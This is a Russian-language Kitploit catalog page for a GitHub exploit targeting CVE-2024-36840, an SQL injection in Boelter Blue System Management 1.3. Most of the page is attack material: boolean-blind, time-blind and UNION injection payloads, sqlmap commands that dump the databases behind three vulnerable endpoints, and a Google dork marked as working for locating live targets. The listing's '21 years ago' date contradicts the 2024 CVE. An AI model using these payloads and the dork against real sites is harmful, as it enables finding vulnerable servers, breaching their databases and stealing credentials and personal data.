Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-36840-Exploit — Эксплойт для: CVE-2024-36840: уязвимость SQL-инъекции в Boelter Blue System Management (версия 1.3) | Kitploit
Инструменты/GitHubGitHub/theexploiters/cve-2024-36840-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubtheexploiters/cve-2024-36840-exploit

CVE-2024-36840-Exploit

Эксплойт для: CVE-2024-36840: уязвимость SQL-инъекции в Boelter Blue System Management (версия 1.3)

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-36840: Уязвимость SQL-инъекции в Boelter Blue System Management (версия 1.3)

Детали эксплойта

  • Название эксплойта: Уязвимость SQL-инъекции в Boelter Blue System Management (версия 1.3)

  • Оригинальный Google Dork: inurl:"Powered by Boelter Blue" (не сработал (ноль URL в поиске))

  • Google Dork от Theexploiters: intext:"Powered by Boelter Blue" (работает)

  • Дата: 2024-06-04

  • Автор эксплойта: CBKB (DeadlyData, R4d1x)

  • Домашняя страница вендора: Boelter Blue

  • Ссылка на ПО: Google Play Store

  • Версия: 1.3

  • Протестировано на: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12

  • CVE: CVE-2024-36840

Описание уязвимости

В Boelter Blue System Management (версия 1.3) выявлено множество уязвимостей SQL-инъекций. Эти уязвимости позволяют злоумышленникам внедрять и выполнять произвольные SQL-команды через различные параметры. Успешная эксплуатация может привести к несанкционированному доступу, утечке данных и возможному захвату учётных записей.

Затронутые параметры и детали эксплойта:

  1. Параметр: id (GET)

    • Тип: Boolean-based blind (слепая инъекция на основе логических условий)
    • Полезная нагрузка: id=10071 AND 4036=4036
  2. Тип: Time-based blind (слепая инъекция на основе времени)

    • Полезная нагрузка: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)
  3. Тип: UNION query (запрос UNION)

    • Полезная нагрузка: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...

Уязвимые конечные точки

  1. news_details.php?id

    • Пример: https://www.example.com/news_details.php?id=10071
    • Эксплуатация:
      root@kitploit:~
      sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
      
  2. services.php?section

    • Пример: https://www.example.com/services.php?section=5081
    • Эксплуатация:
      root@kitploit:~
      sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
      
  3. location_details.php?id

    • Пример: https://www.example.com/location_details.php?id=836
    • Эксплуатация:
      root@kitploit:~
      sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs
      

Воздействие

  • Несанкционированный доступ к базе данных: Эксплуатация может привести к несанкционированному доступу к базе данных, позволяя злоумышленникам извлекать конфиденциальную информацию.
  • Утечка данных: Конфиденциальные данные, такие как учётные данные администратора, персональные данные пользователей (PII) и история покупок, могут быть скомпрометированы.
  • Захват учётных записей: Злоумышленники могут получить контроль над учётными записями пользователей.
  • Полный контроль: Может быть достигнут полный контроль над затронутым приложением, что приводит к серьёзным последствиям для безопасности.

Авторы

  • Обнаружили: CBKB (DeadlyData, R4d1x)

Ссылки

  • Отчёт об уязвимости CyberDepot
  • CVE-2024-36840

Repo View Counter

Скачать инструмент